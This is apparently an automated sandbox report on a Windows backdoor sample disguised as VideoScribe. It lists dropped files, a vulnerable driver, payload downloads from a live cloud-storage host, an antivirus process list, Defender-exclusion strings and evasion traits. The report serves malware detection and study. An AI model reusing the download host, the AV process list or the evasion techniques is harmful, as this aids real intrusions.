Windows Analysis Report
2362476847-83854387.07.exe

Overview

General Information

Sample name: 2362476847-83854387.07.exe
Analysis ID: 1586429
MD5: d7fbf8a45ea736f05b15de0c985b343d
SHA1: f988e97b3d3a4ab12cc09c73f61f1036c133ac4d
SHA256: 889d53f0805721fc02707b8eceadf846274e7e427620e2dda8b7d86c29f034e8
Tags: backdoor, exe, msi, silverfox, winos, user-zhuzhu0009

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Yara signature match

Classification

Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean, suspicious, malicious
  • System is w10x64
  • 2362476847-83854387.07.exe (PID: 4476 cmdline: "C:\Users\user\Desktop\2362476847-83854387.07.exe" MD5: D7FBF8A45EA736F05B15DE0C985B343D)
  • WMZOAN.exe (PID: 1748 cmdline: C:\Users\user\Documents\WMZOAN.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
Source: 12.2.WMZOAN.exe.27f0000.1.unpack
Rule: INDICATOR_SUSPICIOUS_DisableWinDefender
Description: Detects executables containing artifcats associated with disabling Widnows Defender
Author: ditekSHen
Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 2362476847-83854387.07.exe, Virustotal: Detection: 22%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown, HTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: Binary string: d:\adobe\AIR\code\build\win\results\Release\info\CaptiveAppEntry.vc2015.pdb source: 2362476847-83854387.07.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: WMZOAN.exe, 0000000C.00000000.2236498248.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WMZOAN.exe, 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WMZOAN.exe.0.dr
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00007FFB23B0A1B8 FindFirstFileExW, 12_2_00007FFB23B0A1B8
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h] 12_2_000000014000DFFE
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h] 12_2_000000014000DDFF
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then movsxd rbx, qword ptr [r14+10h] 12_2_0000000140011270
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h] 12_2_000000014000DE96
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h] 12_2_000000014000DEFB
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h] 12_2_000000014000E178
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h] 12_2_000000014000DDD9
Source: global traffic, TCP traffic: 192.168.2.7:49447 -> 1.1.1.1:53
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /i.dat HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /a.gif HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /b.gif HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /c.gif HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /d.gif HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /s.dat HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /s.jpg HTTP/1.1; User-Agent: GetData; Host: a8mw1y.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
Source: global traffic, DNS traffic detected: DNS query: a8mw1y.oss-cn-beijing.aliyuncs.com
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003f
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003he
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif.
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif&
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifJ
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifR
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifcom
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifp
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/rt
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/tt
Source: 2362476847-83854387.07.exe, String found in binary or memory: https://airsdk.harman.com/runtime
Source: 2362476847-83854387.07.exe, String found in binary or memory: https://airsdk.harman.com/runtime.kernel32.dll

System Summary

Source: 12.2.WMZOAN.exe.27f0000.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_0000000140006C95 NtAllocateVirtualMemory, 12_2_0000000140006C95
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW, 12_2_0000000140001520
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, File created: C:\Windows\System32\drivers\189atohci.sys
Source: Joe Sandbox View, Dropped File: C:\Users\user\Documents\WMZOAN.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 2362476847-83854387.07.exe, 00000000.00000003.2138959008.0000000004828000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSa.dllp( vs 2362476847-83854387.07.exe
Source: 2362476847-83854387.07.exe, 00000000.00000000.1216438519.0000000141D74000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameVideoScribe.exeH vs 2362476847-83854387.07.exe
Source: 2362476847-83854387.07.exe, Binary or memory string: OriginalFilenameVideoScribe.exeH vs 2362476847-83854387.07.exe
Source: 12.2.WMZOAN.exe.27f0000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.dr, Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr, Binary string: \Device\TrueSight
Source: classification engine, Classification label: mal80.evad.winEXE@2/12@1/1
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer, 12_2_0000000140003F80
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle, 12_2_0000000140001430
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\i[1].dat
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: 2362476847-83854387.07.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, File read: C:\Users\user\Desktop\2362476847-83854387.07.exe
Source: unknown, Process created: C:\Users\user\Desktop\2362476847-83854387.07.exe "C:\Users\user\Desktop\2362476847-83854387.07.exe"
Source: unknown, Process created: C:\Users\user\Documents\WMZOAN.exe C:\Users\user\Documents\WMZOAN.exe
Source: C:\Users\user\Documents\WMZOAN.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Documents\WMZOAN.exe, Section loaded: vselog.dll
Source: C:\Users\user\Documents\WMZOAN.exe, Section loaded: wininet.dll
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: 2362476847-83854387.07.exe, Static PE information: Image base 0x140000000 > 0x60000000
Source: 2362476847-83854387.07.exe, Static file information: File size 30958080 > 1048576
Source: 2362476847-83854387.07.exe, Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58400
Source: 2362476847-83854387.07.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2362476847-83854387.07.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2362476847-83854387.07.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2362476847-83854387.07.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2362476847-83854387.07.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2362476847-83854387.07.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2362476847-83854387.07.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2362476847-83854387.07.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2362476847-83854387.07.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2362476847-83854387.07.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2362476847-83854387.07.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_000000014000F000

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, File created: C:\Users\user\Documents\WMZOAN.exe
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, File created: C:\Users\user\Documents\vselog.dll
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, File created: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW, 12_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\WMZOAN.exe, Memory written: PID: 1748 base: 7FFB2D030008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\WMZOAN.exe, Memory written: PID: 1748 base: 7FFB2CECD9F0 value: E9 20 26 16 00

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, RDTSC instruction interceptor: First address: 1400010CB second address: 1400010E2 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, RDTSC instruction interceptor: First address: 1400010E2 second address: 1400010E2 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F5EA91AAE70h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Window / User API: threadDelayed 545
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Window / User API: threadDelayed 454
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Documents\WMZOAN.exe, Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess, graph_12-14043
Source: C:\Users\user\Documents\WMZOAN.exe, API coverage: 2.7 %
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, TID: 6592, Thread sleep count: 545 > 30
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, TID: 6592, Thread sleep time: -272500s >= -30000s
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, TID: 6592, Thread sleep count: 454 > 30
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, TID: 6592, Thread sleep time: -227000s >= -30000s
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00007FFB23B0A1B8 FindFirstFileExW, 12_2_00007FFB23B0A1B8
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\WMZOAN.exe, API call chain: ExitProcess graph end node, graph_12-14044
Source: C:\Users\user\Documents\WMZOAN.exe, API call chain: ExitProcess graph end node, graph_12-14388
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe, Process information queried: ProcessInformation
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00000001400073E0 LdrLoadDll, 12_2_00000001400073E0
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0000000140007C91
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_000000014000F000
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc, 12_2_0000000140004630
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000001400106B0
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00000001400092E0 SetUnhandledExceptionFilter, 12_2_00000001400092E0
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00007FFB23B01F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FFB23B01F50
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00007FFB23B076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FFB23B076E0
Source: C:\Users\user\Documents\WMZOAN.exe, Code function: 12_2_00007FFB23B02630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FFB23B02630

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Documents\WMZOAN.exe NtAllocateVirtualMemory: Indirect: 0x140006FD0
Source: C:\Users\user\Documents\WMZOAN.exe NtProtectVirtualMemory: Indirect: 0x2A3B253
Source: C:\Users\user\Documents\WMZOAN.exe Code function: 12_2_00007FFB23B0FD40 cpuid 12_2_00007FFB23B0FD40
Source: C:\Users\user\Documents\WMZOAN.exe Code function: GetLocaleInfoA,12_2_000000014000F370
Source: C:\Users\user\Documents\WMZOAN.exe Code function: 12_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_000000014000A370
Source: C:\Users\user\Documents\WMZOAN.exe Code function: 12_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_0000000140005A70
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmp Binary or memory strings: kxetray.exe, vsserv.exe, avcenter.exe, KSafeTray.exe, avp.exe, 360Safe.exe, 360tray.exe, rtvscan.exe, ashDisp.exe, TMBMSRV.exe, avgwdsvc.exe, AYAgent.aye, QUHLPSVC.EXE, RavMonD.exe, MsMpEng.exe, K7TSecurity.exe
Source: C:\Users\user\Documents\WMZOAN.exe Code function: 12_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,12_2_00000001400042B0
Source: C:\Users\user\Documents\WMZOAN.exe Code function: 12_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,12_2_0000000140003F80
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 12 Service Execution; 2 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 24 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 24 Windows Service; 1 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; RC Scripts; Startup Items
Defense Evasion: 31 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 1 Process Injection; 1 Abuse Elevation Control Mechanism; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 131 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 1 File and Directory Discovery; 123 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Credential API Hooking; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
2362476847-83854387.07.exe | 22% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\Documents\WMZOAN.exe | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifp | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif& | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003he | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.jpg | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.dat | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifR | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003f | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/rt | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif. | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifJ | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifcom | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/ | 0% | Avira URL Cloud | safe |
https://a8mw1y.oss-cn-beijing.aliyuncs.com/tt | 0% | Avira URL Cloud | safe |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
a8mw1y.oss-cn-beijing.aliyuncs.com | 59.110.190.44 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.jpg | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.dat | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifp | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003he | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | 189atohci.sys.0.dr, WMZOAN.exe.0.dr | false | | high
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
